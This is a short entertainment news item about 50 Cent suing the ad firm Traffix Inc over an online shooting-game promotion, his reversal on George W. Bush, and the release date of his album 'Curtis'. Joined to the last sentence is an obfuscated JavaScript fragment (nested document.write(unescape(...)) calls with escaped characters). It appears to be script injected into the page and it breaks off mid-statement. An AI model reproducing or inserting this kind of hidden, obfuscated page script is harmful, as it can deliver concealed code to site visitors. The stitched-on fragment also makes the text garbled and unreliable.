50 Cent is suing internet advertising firm Traffix Inc for $1m for an online promotion which allegedly depicts him being shot.
In court papers filed in New York, the rapper, who was famously shot nine times and has courted controversy through his references to firearms, claims that the online game encourages viewers to target him, with a successful shot resulting in a cloud of blood.
His lawyer Peter Raymond stated that the advert does not use 50 Cent's name, but "the character is intended to be him".
Raymond added that the promotion suggests that 50 endorses the company and its services.
He said: "For all those reasons, he is personally offended."
Meanwhile, in another u-turn, it has been revealed that 50 has also changed his political allegiances.
Speaking to New York magazine, the rapper has backtracked on his former support for George W. Bush.
He reportedly commented: "George Bush has a talent: he has less compassion than the average human. By all means, I don't aspire to be like George Bush."
In 2005, 50 told GQ magazine that he thought the president was "incredible" and a "gangsta".
After several delays, his third album, "Curtis", is set for release on September 3rd.document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
